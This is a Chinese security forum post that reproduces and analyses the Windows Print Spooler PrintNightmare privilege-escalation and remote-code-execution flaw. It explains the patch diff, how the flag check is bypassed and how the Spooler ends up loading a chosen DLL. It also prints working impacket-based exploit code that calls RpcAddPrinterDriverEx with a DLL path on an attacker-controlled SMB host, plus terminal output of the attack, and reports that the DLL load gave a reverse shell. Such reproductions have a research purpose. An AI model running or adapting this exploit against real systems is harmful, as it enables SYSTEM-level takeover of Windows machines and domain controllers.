-
-
[原创] Windows PrintNightmare 漏洞复现分析
-
发表于: 2022-1-21 11:13 29270
-
Windows Print Spooler是打印后台处理服务,即管理所有本地和网络打印队列及控制所有打印工作。Windows Print Spooler 存在权限提升漏洞,经过身份认证的攻击者可利用此漏洞使 Spooler 服务加载恶意 DLL,从而获取权限提升。利用此漏洞需身份认证,攻击者可通过多种方式获得身份认证信息。在域环境中合适的条件下,未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。
尽管微软将 PrintNightmare 分配给了 CVE-2021-34527,笔者仍然认为它是 CVE-2021-1675 带来的远程代码执行相关的利用。首先进行补丁对比,比较明显的是 RpcAddPrinterDriverEx 函数,在调用 YAddPrinterDriverEx 函数前会进行判断,如果满足一定条件就对 dwFileCopyFlags 进行 &FFFF7FFF 处理,这样操作是为了取消 dwFileCopyFlags 中指定的 0x8000。
查看文档可知,0x00008000 代表 APD_INSTALL_WARNED_DRIVER,添加打印机驱动程序,即使它在服务器的警告打印机驱动程序列表中。那么下一步就是构造请求使 spooler 程序调用 RpcAddPrinterDriverEx 函数。
首先看一下有没有历史 POC,这样稍作修改就可以使用了。很快就找到了 printerbug.py,它是基于 impacket 写的,并且调用了 RpcOpenPrinter。但是看了下,impacket 中并没有实现 RpcAddPrinterDriverEx,于是参照 impacket.dcerpc.v5.rprn 中的格式,为 RpcAddPrinterDriverEx 添加了类,如下所示:
RpcAddPrinterDriverEx 函数的第二个参数类型 DRIVER_CONTAINER 有些复杂,但参考其他结构的格式很快就能为它写出定义代码:
接下来修改 printerbug.py,主要修改了 PrinterBug 类中的 lookup 函数(这里有一个坑,LPWSTR 这些字符串要以 \x00 结尾,不然会报 rpc_x_bad_stub_data 错误,之前就卡在这里了),如下:
在测试之前还需要在共享的机器上配置允许匿名共享,不然会报错,如下:
在 Windows 机器可以做如下配置:
如果攻击机是 Linux,可以搭建 SMB 服务,然后修改 /etc/samba/smb.conf & sudo service smbd start:
已经有很好的漏洞分析文章了,比如:https://www.freebuf.com/vuls/282023.html
下面不再啰嗦,只是简单记录一下自己想知道的点。
以下为微软文档给出的pName解释:
该参数是一个指向字符串的指针,该字符串指定了该方法所操作的打印服务器的名称。这必须是远程过程调用 (RPC) 绑定到的域名系统 (DNS)、 NetBIOS、 互联网协议版本 4 (IPv4)、互联网协议版本 6 (IPv6)或通用命名约定 (UNC)名称,并且它必须唯一标识网络上的打印服务器。
此参数通过 FindSpoolerByNameIncRef 函数进行检查,如果通过校验,则返回 pLocalIniSpooler。但如果校验失败就不会去执行 SplAddPrinterDriverEx 函数。
在这期间可能会执行 FindSpoolerByNameIncRef->FindSpoolerByName->FindSpooler->CheckMyName->CacheIsNameInNodeList->TNameResolutionCache::IsNameInNodeCache->TResolutionCacheNode::IsNameInNodeCache,直到匹配到一个 pName,如下所示:
以下代码说明 pName 可以为 NULL,在 FindSpoolerByName 函数中如果 pName 不以 "\\" 开头则被判定为 LocalIniSpooler。在 SplAddPrinterDriverEx 函数中还是会调用 MyName->CheckMyName,如果 pName 为 NULL 的话,也会返回 1,这样也可以通过校验。Python 版的 poc 里面 pName 的值就是 NULL。"\\" 也是可以的,可以自己调试一下。
继续看 localspl!SplAddPrinterDriverEx 函数,如果通过了 MyName 校验,会执行下面的代码,比较 dwFileCopyFlags 的第 0xF(15,从0开始索引) 是否被设置,如果设置了该比特位(我们已将其设置为 0x8014),就不会执行 v11 = 1 将 v11 置 1,因而在执行 if ( v11 && !(unsigned int)ValidateObjectAccess(0, 1, 0i64, 0i64, (__int64)pLocalIniSpooler, 0) ) 时,v11 还是 0,从而绕过 ValidateObjectAccess 函数的检查去执行 InternalAddPrinterDriverEx 函数。InternalAddPrinterDriverEx 函数执行完之后,Spooler 服务就会加载指定的 DriverFile 和 ConfigFile 模块,如下所示:
通过前面分析,我们已经有办法可以让 Spooler 服务加载指定 DLL,还是要试一下看它可不可以加载网络上的文件,这样影响将更大一些(本地变远程)。如果将 pConfigFile 直接设置为 UNC 路径(网络路径)会报错。这是因为在 InternalAddPrinterDriverEx 调用 ValidateDriverInfo 函数时会进行以下判断,如果 dwFileCopyFlags 设置了 0x10,pDriverPath 和 pConfigFile 必须是本地文件,否则就会产生 0x57 错误。
以下为调试时信息,可更加直观展示这一流程:
再来看一下文件操作吧,借助 Process Monitor 我们可以看到程序先在 C:\Windows\System32\spool\drivers\x64\3 路径下创建了 Old 和 New 文件夹。
将驱动文件复制到 C:\Windows\System32\spool\drivers\x64\3\New\ 文件夹下,同理 pConfigFile、pDataFile 也被复制进来。
当多次去调用 RpcAddPrinterDriverEx 函数时程序会进行以下操作:
将新的文件复制到 C:\Windows\System32\spool\drivers\x64\3\New\ 目录下
将 C:\Windows\System32\spool\drivers\x64\3 路径下的相关文件移动到 C:\Windows\System32\spool\drivers\x64\3\Old\1 ( 或 2、3……) ,然后将 C:\Windows\System32\spool\drivers\x64\3\New\ 目录下的相关文件移动到 C:\Windows\System32\spool\drivers\x64\3 路径下
然后加载 C:\Windows\System32\spool\drivers\x64\3 路径下的 pDriverPath 和 pConfigFile
这样我们在后面的请求中将 pConfigFile 设置为 C:\Windows\System32\spool\drivers\x64\3\Old\X\asd.dll,如下所示,Spooler 服务成功加载恶意 DLL,并反弹了 SHELL。
参考链接:
https://github.com/numanturle/PrintNightmare
https://www.freebuf.com/vuls/282023.html
https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ
https://mp.weixin.qq.com/s/8j4ylHr8ZDhlrWMAwhVcmQ
# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)
class
RpcAddPrinterDriverEx(NDRCALL):
opnum
=
89
structure
=
(
(
'pName'
, STRING_HANDLE),
(
'pDriverContainer'
, DRIVER_CONTAINER),
(
'dwFileCopyFlags'
, DWORD),
)
class
RpcAddPrinterDriverExResponse(NDRCALL):
structure
=
(
(
'ErrorCode'
, ULONG),
)
def
hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags, level
=
2
):
request
=
RpcAddPrinterDriverEx()
request[
'pName'
]
=
pName
request[
'pDriverContainer'
]
=
DriverContainer
request[
'dwFileCopyFlags'
]
=
flags
dce.request(request)
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS
=
{
0
: (RpcEnumPrinters, RpcEnumPrintersResponse),
1
: (RpcOpenPrinter, RpcOpenPrinterResponse),
10
: (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
29
: (RpcClosePrinter, RpcClosePrinterResponse),
65
: (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
69
: (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
89
: (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}
# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)
class
RpcAddPrinterDriverEx(NDRCALL):
opnum
=
89
structure
=
(
(
'pName'
, STRING_HANDLE),
(
'pDriverContainer'
, DRIVER_CONTAINER),
(
'dwFileCopyFlags'
, DWORD),
)
class
RpcAddPrinterDriverExResponse(NDRCALL):
structure
=
(
(
'ErrorCode'
, ULONG),
)
def
hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags, level
=
2
):
request
=
RpcAddPrinterDriverEx()
request[
'pName'
]
=
pName
request[
'pDriverContainer'
]
=
DriverContainer
request[
'dwFileCopyFlags'
]
=
flags
dce.request(request)
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS
=
{
0
: (RpcEnumPrinters, RpcEnumPrintersResponse),
1
: (RpcOpenPrinter, RpcOpenPrinterResponse),
10
: (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
29
: (RpcClosePrinter, RpcClosePrinterResponse),
65
: (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
69
: (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
89
: (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}
##################################### MY ADD ######################################
# 2.2.1.5.1 DRIVER_INFO_1
class
DRIVER_INFO_1(NDRSTRUCT):
structure
=
(
(
'notUsed'
,ULONGLONG),
)
class
PDRIVER_INFO_1(NDRPOINTER):
referent
=
(
(
'Data'
, DRIVER_INFO_1),
)
# 2.2.1.5.2 DRIVER_INFO_2
class
DRIVER_INFO_2(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
)
class
PDRIVER_INFO_2(NDRPOINTER):
referent
=
(
(
'Data'
, DRIVER_INFO_2),
)
# 2.2.1.5.3 RPC_DRIVER_INFO_3
class
RPC_DRIVER_INFO_3(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
(
'pHelpFile'
,LPWSTR),
(
'pMonitorName'
,LPWSTR),
(
'pDefaultDataType'
,LPWSTR),
(
'cchDependentFiles'
,DWORD),
(
'pDependentFiles'
,LPWSTR),
)
class
PRPC_DRIVER_INFO_3(NDRPOINTER):
referent
=
(
(
'Data'
, RPC_DRIVER_INFO_3),
)
# 2.2.1.5.4 RPC_DRIVER_INFO_4
class
RPC_DRIVER_INFO_4(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
(
'pHelpFile'
,LPWSTR),
(
'pMonitorName'
,LPWSTR),
(
'pDefaultDataType'
,LPWSTR),
(
'cchDependentFiles'
,DWORD),
(
'pDependentFiles'
,LPWSTR),
(
'cchPreviousNames'
,DWORD),
(
'pszzPreviousNames'
,LPWSTR),
)
class
PRPC_DRIVER_INFO_4(NDRPOINTER):
referent
=
(
(
'Data'
, RPC_DRIVER_INFO_4),
)
# 2.2.1.5.5 RPC_DRIVER_INFO_6
class
FILETIME(NDRSTRUCT):
structure
=
(
(
'dwLowDateTime'
,DWORD),
(
'dwHighDateTime'
,DWORD),
)
class
RPC_DRIVER_INFO_6(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
(
'pHelpFile'
,LPWSTR),
(
'pMonitorName'
,LPWSTR),
(
'pDefaultDataType'
,LPWSTR),
(
'cchDependentFiles'
,DWORD),
(
'pDependentFiles'
,LPWSTR),
(
'cchPreviousNames'
,DWORD),
(
'pszzPreviousNames'
,LPWSTR),
(
'ftDriverDate'
,FILETIME),
(
'dwlDriverVersion'
,ULONGLONG),
(
'pMfgName'
,LPWSTR),
(
'pOEMUrl'
,LPWSTR),
(
'pHardwareID'
,LPWSTR),
(
'pProvider'
,LPWSTR),
)
class
PRPC_DRIVER_INFO_6(NDRPOINTER):
referent
=
(
(
'Data'
, RPC_DRIVER_INFO_6),
)
# 2.2.1.5.6 RPC_DRIVER_INFO_8
class
RPC_DRIVER_INFO_8(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
(
'pHelpFile'
,LPWSTR),
(
'pMonitorName'
,LPWSTR),
(
'pDefaultDataType'
,LPWSTR),
(
'cchDependentFiles'
,DWORD),
(
'pDependentFiles'
,LPWSTR),
(
'cchPreviousNames'
,DWORD),
(
'pszzPreviousNames'
,LPWSTR),
(
'ftDriverDate'
,FILETIME),
(
'dwlDriverVersion'
,ULONGLONG),
(
'pMfgName'
,LPWSTR),
(
'pOEMUrl'
,LPWSTR),
(
'pHardwareID'
,LPWSTR),
(
'pProvider'
,LPWSTR),
(
'pPrintProcessor'
,LPWSTR),
(
'pVendorSetup'
,LPWSTR),
(
'cchColorProfiles'
,DWORD),
(
'pszzColorProfiles'
,LPWSTR),
(
'pInfPath'
,LPWSTR),
(
'dwPrinterDriverAttributes'
,DWORD),
(
'cchCoreDependencies'
,DWORD),
(
'ftMinInboxDriverVerDate'
,FILETIME),
(
'dwlMinInboxDriverVerVersion'
,ULONGLONG),
)
class
PRPC_DRIVER_INFO_8(NDRPOINTER):
referent
=
(
(
'Data'
, RPC_DRIVER_INFO_8),
)
# 2.2.1.2.3 DRIVER_CONTAINER
class
Driver_Info_UNION(NDRUNION):
commonHdr
=
(
(
'tag'
, ULONG),
)
union
=
{
1
: (
'pNotUsed'
, PDRIVER_INFO_1),
2
: (
'Level2'
, PDRIVER_INFO_2),
3
: (
'Level3'
, PRPC_DRIVER_INFO_3),
4
: (
'Level4'
, PRPC_DRIVER_INFO_4),
5
: (
'Level6'
, PRPC_DRIVER_INFO_6),
6
: (
'Level8'
, PRPC_DRIVER_INFO_8),
}
class
DRIVER_CONTAINER(NDRSTRUCT):
structure
=
(
(
'Level'
,DWORD),
(
'DriverInfo'
,Driver_Info_UNION),
)
##################################### MY ADD ######################################
# 2.2.1.5.1 DRIVER_INFO_1
class
DRIVER_INFO_1(NDRSTRUCT):
structure
=
(
(
'notUsed'
,ULONGLONG),
)
class
PDRIVER_INFO_1(NDRPOINTER):
referent
=
(
(
'Data'
, DRIVER_INFO_1),
)
# 2.2.1.5.2 DRIVER_INFO_2
class
DRIVER_INFO_2(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
)
class
PDRIVER_INFO_2(NDRPOINTER):
referent
=
(
(
'Data'
, DRIVER_INFO_2),
)
# 2.2.1.5.3 RPC_DRIVER_INFO_3
class
RPC_DRIVER_INFO_3(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
(
'pHelpFile'
,LPWSTR),
(
'pMonitorName'
,LPWSTR),
(
'pDefaultDataType'
,LPWSTR),
(
'cchDependentFiles'
,DWORD),
(
'pDependentFiles'
,LPWSTR),
)
class
PRPC_DRIVER_INFO_3(NDRPOINTER):
referent
=
(
(
'Data'
, RPC_DRIVER_INFO_3),
)
# 2.2.1.5.4 RPC_DRIVER_INFO_4
class
RPC_DRIVER_INFO_4(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
(
'pHelpFile'
,LPWSTR),
(
'pMonitorName'
,LPWSTR),
(
'pDefaultDataType'
,LPWSTR),
(
'cchDependentFiles'
,DWORD),
(
'pDependentFiles'
,LPWSTR),
(
'cchPreviousNames'
,DWORD),
(
'pszzPreviousNames'
,LPWSTR),
)
class
PRPC_DRIVER_INFO_4(NDRPOINTER):
referent
=
(
(
'Data'
, RPC_DRIVER_INFO_4),
)
# 2.2.1.5.5 RPC_DRIVER_INFO_6
class
FILETIME(NDRSTRUCT):
structure
=
(
(
'dwLowDateTime'
,DWORD),
(
'dwHighDateTime'
,DWORD),
)
class
RPC_DRIVER_INFO_6(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
(
'pHelpFile'
,LPWSTR),
(
'pMonitorName'
,LPWSTR),
(
'pDefaultDataType'
,LPWSTR),
(
'cchDependentFiles'
,DWORD),
(
'pDependentFiles'
,LPWSTR),
(
'cchPreviousNames'
,DWORD),
(
'pszzPreviousNames'
,LPWSTR),
(
'ftDriverDate'
,FILETIME),
(
'dwlDriverVersion'
,ULONGLONG),
(
'pMfgName'
,LPWSTR),
(
'pOEMUrl'
,LPWSTR),
(
'pHardwareID'
,LPWSTR),
(
'pProvider'
,LPWSTR),
)
class
PRPC_DRIVER_INFO_6(NDRPOINTER):
referent
=
(
(
'Data'
, RPC_DRIVER_INFO_6),
)
# 2.2.1.5.6 RPC_DRIVER_INFO_8
class
RPC_DRIVER_INFO_8(NDRSTRUCT):
structure
=
(
(
'cVersion'
,DWORD),
(
'pName'
,LPWSTR),
(
'pEnvironment'
,LPWSTR),
(
'pDriverPath'
,LPWSTR),
(
'pDataFile'
,LPWSTR),
(
'pConfigFile'
,LPWSTR),
(
'pHelpFile'
,LPWSTR),
(
'pMonitorName'
,LPWSTR),
(
'pDefaultDataType'
,LPWSTR),
(
'cchDependentFiles'
,DWORD),
(
'pDependentFiles'
,LPWSTR),
(
'cchPreviousNames'
,DWORD),
(
'pszzPreviousNames'
,LPWSTR),
(
'ftDriverDate'
,FILETIME),
(
'dwlDriverVersion'
,ULONGLONG),
(
'pMfgName'
,LPWSTR),
(
'pOEMUrl'
,LPWSTR),
(
'pHardwareID'
,LPWSTR),
(
'pProvider'
,LPWSTR),
(
'pPrintProcessor'
,LPWSTR),
(
'pVendorSetup'
,LPWSTR),
(
'cchColorProfiles'
,DWORD),
(
'pszzColorProfiles'
,LPWSTR),
(
'pInfPath'
,LPWSTR),
(
'dwPrinterDriverAttributes'
,DWORD),
(
'cchCoreDependencies'
,DWORD),
(
'ftMinInboxDriverVerDate'
,FILETIME),
(
'dwlMinInboxDriverVerVersion'
,ULONGLONG),
)
class
PRPC_DRIVER_INFO_8(NDRPOINTER):
referent
=
(
(
'Data'
, RPC_DRIVER_INFO_8),
)
# 2.2.1.2.3 DRIVER_CONTAINER
class
Driver_Info_UNION(NDRUNION):
commonHdr
=
(
(
'tag'
, ULONG),
)
union
=
{
1
: (
'pNotUsed'
, PDRIVER_INFO_1),
2
: (
'Level2'
, PDRIVER_INFO_2),
3
: (
'Level3'
, PRPC_DRIVER_INFO_3),
4
: (
'Level4'
, PRPC_DRIVER_INFO_4),
5
: (
'Level6'
, PRPC_DRIVER_INFO_6),
6
: (
'Level8'
, PRPC_DRIVER_INFO_8),
}
class
DRIVER_CONTAINER(NDRSTRUCT):
structure
=
(
(
'Level'
,DWORD),
(
'DriverInfo'
,Driver_Info_UNION),
)
#def lookup(self, rpctransport, host):
level
=
2
Driver_Info_Union
=
rprn.Driver_Info_UNION()
Driver_Info_Union[
'tag'
]
=
level
DRIVER_INFO
=
Driver_Info_Union[
"Level"
+
str
(level)]
DRIVER_INFO[
'cVersion'
]
=
3
DRIVER_INFO[
'pName'
]
=
"Test printer\x00"
DRIVER_INFO[
'pEnvironment'
]
=
"Windows x64\x00"
DRIVER_INFO[
'pDriverPath'
]
=
pDriverPath
DRIVER_INFO[
'pDataFile'
]
=
"\\\\{}\\smb\\asd.dll\x00"
.
format
(
self
.__attackerhost)
DRIVER_INFO[
'pConfigFile'
]
=
"C:\\Windows\\System32\\winhttp.dll\x00"
DriverContainer
=
rprn.DRIVER_CONTAINER()
DriverContainer[
'Level'
]
=
level
DriverContainer[
'DriverInfo'
]
=
Driver_Info_Union
#resp = rprn.hRpcEnumPrinters(dce, rprn.PRINTER_ENUM_NAME)
print
(
"[*] Attempting to call RpcAddPrinterDriverEx"
)
pName
=
NULL
flags
=
rprn.APD_COPY_ALL_FILES |
0x10
|
0x8000
resp
=
rprn.hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags)
#def lookup(self, rpctransport, host):
level
=
2
Driver_Info_Union
=
rprn.Driver_Info_UNION()
Driver_Info_Union[
'tag'
]
=
level
DRIVER_INFO
=
Driver_Info_Union[
"Level"
+
str
(level)]
DRIVER_INFO[
'cVersion'
]
=
3
DRIVER_INFO[
'pName'
]
=
"Test printer\x00"
DRIVER_INFO[
'pEnvironment'
]
=
"Windows x64\x00"
DRIVER_INFO[
'pDriverPath'
]
=
pDriverPath
DRIVER_INFO[
'pDataFile'
]
=
"\\\\{}\\smb\\asd.dll\x00"
.
format
(
self
.__attackerhost)
DRIVER_INFO[
'pConfigFile'
]
=
"C:\\Windows\\System32\\winhttp.dll\x00"
DriverContainer
=
rprn.DRIVER_CONTAINER()
DriverContainer[
'Level'
]
=
level
DriverContainer[
'DriverInfo'
]
=
Driver_Info_Union
#resp = rprn.hRpcEnumPrinters(dce, rprn.PRINTER_ENUM_NAME)
print
(
"[*] Attempting to call RpcAddPrinterDriverEx"
)
pName
=
NULL
flags
=
rprn.APD_COPY_ALL_FILES |
0x10
|
0x8000
resp
=
rprn.hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags)
┌──(strawberry㉿kalilili)
-
[~]
└─$ python testprinter.py strawberry@
192.168
.
140.222
192.168
.
140.144
[
*
] Impacket v0.
9.24
.dev1
+
20210618.54810
.
11f43043
-
Copyright
2021
SecureAuth Corporation
Password:
[
*
] Attempting to trigger authentication via rprn RPC at
192.168
.
140.222
[
*
] Bind OK
[
*
] Attempting to call RpcAddPrinterDriverEx ......
[
-
] Lookup Error: RPRN SessionError: code:
0x2
-
ERROR_FILE_NOT_FOUND
-
The system cannot find the
file
specified.
┌──(strawberry㉿kalilili)
-
[~]
└─$ python testprinter.py strawberry@
192.168
.
140.222
192.168
.
140.144
[
*
] Impacket v0.
9.24
.dev1
+
20210618.54810
.
11f43043
-
Copyright
2021
SecureAuth Corporation